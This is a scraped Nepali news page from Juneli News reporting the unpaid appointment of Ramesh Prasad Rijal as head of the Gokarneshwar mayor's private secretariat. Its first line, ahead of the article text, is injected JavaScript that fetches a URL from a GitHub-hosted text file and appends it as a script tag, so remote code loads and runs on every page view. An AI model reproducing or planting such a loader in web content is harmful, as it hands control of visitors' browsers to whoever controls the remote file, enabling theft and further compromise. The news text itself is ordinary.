;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नगर प्रमुखको सचिवालय प्रमुखमा रमेश रिजाल – जुनेली न्युज
शनिबार, साउन ५, २०८२
  • होमपेज
  • गोकर्णेश्वर नगर प्रमुखको सचिवालय प्रमुखमा रमेश रिजाल
Breaking News

गोकर्णेश्वर नगर प्रमुखको सचिवालय प्रमुखमा रमेश रिजाल

जुनेली न्युज, काठमाडौँ

काठमाडौँ गोकर्णेश्वर नगरपालिका नगर प्रमुखको निजि सचिवालय  प्रमुखमा रमेश प्रसाद रिजाल नियुक्त भएका छन् |

No description available.

मिति २०७९ चैत १३ गते देखि लागु हुने गरि कार्यालयको आन्तरिक कार्यप्रणाली र सचिवाललाइ सुव्याबस्थित गर्दै जावाफदेहि बनाइ रेखदेख तथा आन्तरिक प्रणालीलाई राम्रो गरि सेवाग्राही मुखी बनाउने भनि नगर प्रमुख दिपक रिसालले सचिवालय प्रमुखमा नियुक्ति गरेका हुन् |कुनै सेवा सुबिधा तलब भत्ता नलिई अबैतानिक जिम्मेवारी समाल्ने गरि नियुक्ति गरिएको हो |

No description available.
रिजाल नेपाली काँग्रेस काठमाडौँ क्षेत्र नं ३ गोकर्णेश्वर नगर समितिका सचिब समेत हुन् |

 

No description available.

 

फेसबुक प्रतिक्रियाहरु